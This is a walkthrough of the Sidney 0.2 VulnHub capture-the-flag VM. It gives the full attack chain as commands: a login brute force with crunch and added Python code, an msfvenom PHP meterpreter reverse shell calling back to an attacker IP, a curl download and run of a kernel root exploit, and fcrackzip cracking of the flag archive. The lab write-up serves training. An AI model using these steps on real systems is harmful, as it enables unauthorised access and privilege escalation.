
Today we will take on another boot2root challenge by Nightmares. This is the third challenge he has put together. The VM is set to grab a DHCP lease on boot. As before, gaining root is not the end of this VM; you also have to capture the flag.
You can download this VM from –> https://www.vulnhub.com/entry/sidney-02,149/
Walkthrough
First we need to find out which IP the VM got, so scan the network with:
netdiscover
Having found our target IP, 192.168.0.104, the next step is to scan it:
nmap -A -p- 192.168.0.104
The scan shows that port 80 is open, which means the target serves a web page, so let us open it in the browser.
Opening the target IP in the browser did not give us much, so we use curl to learn more about the target:
curl -v http://192.168.0.104/
If you look at the source code, you can see that "commodore64" is used a lot. So we opened that path in the browser (192.168.0.104/commodore64) and, luckily, found another page.
We then decided to examine its page source.
Reading the page source you learn that the username is robhubbard and, further down, you find a few hints about the password:
the password is in lowercase
the password has 3 letters and four digits
and it is related to the C=64 sound chip
After looking through the page source we tried to explore further with nikto:
nikto -h http://192.168.0.104/commodore64/
Running nikto proved helpful, as it found an index.php file. We opened it and, as you can see, it asks for a username and password. We already know the username; we just need to find the password.
Given the above hints about the password, we first looked up the C=64 sound chip on Wikipedia, and found:
We know the first three characters of the password are letters, so our best guess is that the password starts with mos (the chip is made by MOS Technology, and the hint says lowercase).
Now everything hinges on the last four digits of the password, and to enumerate those we used crunch:
crunch 7 7 -t mos%%%% -o /root/Desktop/pass.txt
Crunch writes the dictionary file. With -t, the minimum and maximum length (7 7) must both equal the length of the pattern, and each % stands for one digit, so this gives 10,000 candidates.
Then run a dictionary attack against the login form with Burp Suite, which will reveal the password as shown below:
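The wordlist generation and the login attack above, as an added example that is not part of the original walkthrough. It generalises the crunch -t template beyond mos%%%% (all four crunch placeholder classes), shows the driver loop that Burp Suite runs for you, and keeps it offline by attacking a simulated index.php with a constructed secret; http_form_attempt() is the HTTP variant, and its URL, form field names and failure marker are assumptions that have to be read off the real form first.

```python
"""Crunch-style candidate generation and a login dictionary-attack driver.

Added example, not code from the original walkthrough. The login target here is simulated
with a constructed secret so the script runs offline; http_form_attempt() is the HTTP
variant, and its URL, form field names and failure marker are assumptions that must be
read off the real index.php form before use.
"""
import itertools
import string
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Iterable, Iterator, Optional

# crunch -t placeholders: @ lowercase letter, , uppercase letter, % digit, ^ symbol.
# Any other character in the template is kept literally.
CRUNCH_CLASSES = {
    "@": string.ascii_lowercase,
    ",": string.ascii_uppercase,
    "%": string.digits,
    "^": string.punctuation,
}


def expand_template(template: str) -> Iterator[str]:
    """Yield every word matching a crunch -t template: 'mos%%%%' -> mos0000 .. mos9999."""
    pools = [CRUNCH_CLASSES.get(ch, ch) for ch in template]
    for combo in itertools.product(*pools):
        yield "".join(combo)


def template_size(template: str) -> int:
    """Number of candidates a template expands to; check this before an online attack."""
    size = 1
    for ch in template:
        size *= len(CRUNCH_CLASSES.get(ch, ch))
    return size


def write_wordlist(template: str, path: str) -> int:
    """Same output as `crunch N N -t TEMPLATE -o path` (one word per line); returns the count."""
    count = 0
    with open(path, "w") as fh:
        for word in expand_template(template):
            fh.write(word + "\n")
            count += 1
    return count


def brute_force(username: str, candidates: Iterable[str],
                attempt: Callable[[str, str], bool]) -> Optional[str]:
    """Return the first candidate that attempt(username, candidate) accepts, else None."""
    for password in candidates:
        if attempt(username, password):
            return password
    return None


def http_form_attempt(url: str, username: str, password: str, failure_marker: bytes,
                      user_field: str = "username", pass_field: str = "password",
                      timeout: float = 5.0) -> bool:
    """POST one credential pair to a login form; success = the failure text is absent.

    user_field, pass_field and failure_marker are assumptions: take them from the real form
    and from a deliberately failed login (this is what Burp Intruder's grep match does)."""
    data = urllib.parse.urlencode({user_field: username, pass_field: password}).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read()
    except urllib.error.HTTPError:  # a 401/403 on bad credentials counts as a failed login
        return False
    return failure_marker not in body


def fake_login(secret: str) -> Callable[[str, str], bool]:
    """Stand-in for the index.php form: accepts exactly one constructed credential pair."""
    def attempt(username: str, password: str) -> bool:
        return username == "robhubbard" and password == secret
    return attempt


if __name__ == "__main__":
    template = "mos%%%%"
    print(f"{template!r} expands to {template_size(template)} candidates")
    # Constructed secret for the offline demo; the VM's real password is not reproduced here.
    found = brute_force("robhubbard", expand_template(template), fake_login("mos4321"))
    print("found:", found)
    # Against the real box the callback would be, e.g. (URL and marker are assumptions):
    # lambda u, p: http_form_attempt("http://192.168.0.104/commodore64/index.php", u, p, b"Login failed")
```

write_wordlist("mos%%%%", "pass.txt") produces the same file the crunch command writes, which you can then load into Burp Intruder as the payload list instead of driving the form from this script.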
Now enter the username and password on the index.php page. The following page will open, and on it you need to upload a malicious PHP file.
After entering the password you are logged in to the following page:
To generate that PHP payload, open a terminal in Kali and type:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.106 lport=4444 -f raw
Copy the code from <?php up to and including die() and save it in a file with a .php extension. Then upload this file by browsing to it on the web page.
Meanwhile, open Metasploit and type:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.106
set lport 4444
exploit
The lhost and lport of the handler must match the values baked into the msfvenom payload, otherwise the callback never arrives. Once the uploaded PHP file is requested on the web server, the handler catches a meterpreter session. Then type:
shell
If you type the usual pair of commands to get a proper terminal through python's pty module, it will not work here, because the box has a newer python (python3.5) rather than the python binary the command expects:
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py
So to get around this, run the same thing with the interpreter that is actually present:
python3.5 -c 'import pty; pty.spawn("/bin/bash")'
pty.spawn launches /bin/bash itself, so no separate /bin/bash invocation is needed.
Now you have a proper terminal. Here, type the following to find out the distribution release (the kernel version itself comes from uname -r):
lsb_release -a
Knowing the release, we search for a matching kernel exploit on www.exploit-db.com.
The exploit page provides a link to download the exploit archive.
Now we need a writable directory on the target to download it into, so type:
find / -writable -type d 2>/dev/null
Then go into one of those directories:
cd /tmp
In /tmp, trying to fetch the file with wget gives an error, so we use curl this time:
curl -O https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/39772.zip
Now unzip the file:
unzip 39772.zip
Enter the extracted directory:
cd 39772
Inside there is a tar archive named exploit.tar. List the directory and extract it:
ls
tar -xvf exploit.tar
Now move into the directory that holds doubleput.c:
cd ebpf_mapfd_doubleput_exploit
From here, type:
ls (lists the directory contents)
./compile.sh (runs compile.sh, which builds doubleput.c)
./doubleput (runs the compiled exploit)
whoami (tells you who you are now, which should be root)
cd /root (takes you into /root)
ls (shows you the contents of /root)
Now we are root on our target. Let us see what /root holds, so type:
ls -lsa
From the files listed we will try hint.gif, but first we need to copy it into the web root, so type:
cp hint.gif /var/www/html
Now if you open hint.gif in the browser it shows you the following image:
So we also look at the other entries, such as the .commodore64 directory, so type:
cd .commodore64
And again, to see what it holds, type:
ls -lsa
From the entries listed we open the following:
cd .miami
ls -lsa (lists the directories further)
cd vice (go into vice)
Here we find flag.zip.
Do not get too excited: we have found the flag, but we still have to open it. And here is the catch: if you try to open the zip file it asks for a password. So we will pull it over to our own machine through the browser, and for that we first need to copy it into the web root, so type:
cp flag.zip /var/www/html/commodore64
Opening that path in the browser prompts you to download flag.zip, so download it.
We will run a dictionary attack against it with rockyou.txt; the command is:
fcrackzip -vuD -p /usr/share/wordlists/rockyou.txt /root/Desktop/flag.zip
Here -D selects dictionary mode, -p names the wordlist, -v is verbose and -u makes fcrackzip confirm each candidate by actually unzipping with it, which weeds out the false positives that the zip format's own one-byte password check lets through. And yes, at last you have the password. Now unzip flag.zip:
unzip flag.zip
It asks for the password; enter the one you just recovered.
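The fcrackzip and unzip steps above, as an added example that is not part of the original walkthrough. It builds a small ZipCrypto (traditional PKWARE) encrypted archive in memory as a stand-in for flag.zip, with constructed content and a constructed password, and runs a dictionary attack on it with nothing but the standard library. The point it shows is why the -u flag matters: ZipCrypto stores a single check byte in its 12-byte header, so about one wrong password in 256 passes the cheap check, and only a full extraction with CRC verification settles it. The wordlist is a constructed stand-in for rockyou.txt; iter_wordlist() streams the real file.

```python
"""Dictionary attack on a ZipCrypto (traditional PKWARE) protected archive.

Added example, not code from the original walkthrough. The archive, its content and its
password are constructed in memory so the script runs offline; point iter_wordlist() at
rockyou.txt and crack_zip() at the real flag.zip bytes to use it for real.
"""
import io
import struct
import zipfile
import zlib
from typing import Iterable, Iterator, Optional


def _crc32_step(crc: int, byte: int) -> int:
    # One raw CRC-32 table step without the pre/post inversion, as PKWARE's key update uses it.
    return zlib.crc32(bytes([byte]), crc ^ 0xFFFFFFFF) ^ 0xFFFFFFFF


class ZipCrypto:
    """Traditional PKWARE stream cipher: three 32-bit keys seeded from the password."""

    def __init__(self, password: bytes) -> None:
        self.k0, self.k1, self.k2 = 0x12345678, 0x23456789, 0x34567890
        for c in password:
            self._update(c)

    def _update(self, c: int) -> None:
        self.k0 = _crc32_step(self.k0, c)
        self.k1 = (self.k1 + (self.k0 & 0xFF)) & 0xFFFFFFFF
        self.k1 = (self.k1 * 134775813 + 1) & 0xFFFFFFFF
        self.k2 = _crc32_step(self.k2, self.k1 >> 24)

    def _keystream_byte(self) -> int:
        t = self.k2 | 2
        return ((t * (t ^ 1)) >> 8) & 0xFF

    def encrypt(self, plaintext: bytes) -> bytes:
        out = bytearray()
        for c in plaintext:
            out.append(c ^ self._keystream_byte())
            self._update(c)  # the key state advances on the plaintext byte
        return bytes(out)


def make_encrypted_zip(name: str, plaintext: bytes, password: bytes) -> bytes:
    """Build a minimal single-entry, stored, ZipCrypto-encrypted archive (constructed flag.zip)."""
    crc = zlib.crc32(plaintext) & 0xFFFFFFFF
    # 12-byte encryption header: 11 filler bytes (random in real archivers), then the CRC's
    # high byte. That one byte is all a decryptor can check without extracting the entry.
    enc_header = bytes(range(1, 12)) + bytes([(crc >> 24) & 0xFF])
    body = ZipCrypto(password).encrypt(enc_header + plaintext)
    fname = name.encode("ascii")
    flags, method, mtime, mdate = 0x0001, zipfile.ZIP_STORED, 0, 0x4821  # bit 0 = encrypted; 2016-01-01
    local = struct.pack("<IHHHHHIIIHH", 0x04034B50, 20, flags, method, mtime, mdate,
                        crc, len(body), len(plaintext), len(fname), 0) + fname
    central = struct.pack("<IHHHHHHIIIHHHHHII", 0x02014B50, 20, 20, flags, method, mtime, mdate,
                          crc, len(body), len(plaintext), len(fname), 0, 0, 0, 0, 0, 0) + fname
    eocd = struct.pack("<IHHHHIIH", 0x06054B50, 0, 0, 1, 1, len(central), len(local) + len(body), 0)
    return local + body + central + eocd


def _accepted(archive: bytes, wordlist: Iterable[str], verify: bool) -> Iterator[str]:
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        entry = zf.infolist()[0]
        for word in wordlist:
            try:
                with zf.open(entry, pwd=word.encode("latin-1")) as fh:
                    if verify:
                        fh.read()  # full extraction: the stored CRC-32 must match
            except RuntimeError:  # header check byte mismatch: definitely wrong
                continue
            except (zipfile.BadZipFile, zlib.error):  # check byte matched by chance, data did not
                continue
            yield word


def header_survivors(archive: bytes, wordlist: Iterable[str]) -> list:
    """Words that pass only the 1-byte header check (what fcrackzip reports without -u)."""
    return list(_accepted(archive, wordlist, verify=False))


def crack_zip(archive: bytes, wordlist: Iterable[str]) -> Optional[str]:
    """First word that passes the header check AND a CRC-verified extraction (fcrackzip -u)."""
    return next(_accepted(archive, wordlist, verify=True), None)


def extract_entry(archive: bytes, password: str) -> bytes:
    """Extract the single entry with a known password (what `unzip flag.zip` does at the end)."""
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        return zf.read(zf.infolist()[0], pwd=password.encode("latin-1"))


def iter_wordlist(path: str) -> Iterator[str]:
    """Stream a wordlist such as /usr/share/wordlists/rockyou.txt; latin-1 keeps every byte intact."""
    with open(path, encoding="latin-1") as fh:
        for line in fh:
            yield line.rstrip("\r\n")


if __name__ == "__main__":
    SECRET = "c64rules"  # constructed; not the VM's real zip password
    archive = make_encrypted_zip("flag.txt", b"FLAG{constructed-example}\n", SECRET.encode())
    # Constructed stand-in for rockyou.txt: a few thousand junk words plus the secret.
    words = [f"guess{i:04d}" for i in range(3000)] + ["password", "commodore", SECRET]
    weak = header_survivors(archive, words)
    print(f"{len(weak)} of {len(words)} words pass the 1-byte header check: {weak}")
    print("CRC-verified password:", crack_zip(archive, words))
    print(extract_entry(archive, SECRET).decode())
```

Run as is, header_survivors() typically returns a dozen words for 3,000 candidates while crack_zip() returns only the real one; that difference is exactly what fcrackzip -u is for. To use it against the real archive, pass open("flag.zip", "rb").read() and iter_wordlist("/usr/share/wordlists/rockyou.txt").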
And YAY!!!!! We have captured the flag! Enjoy.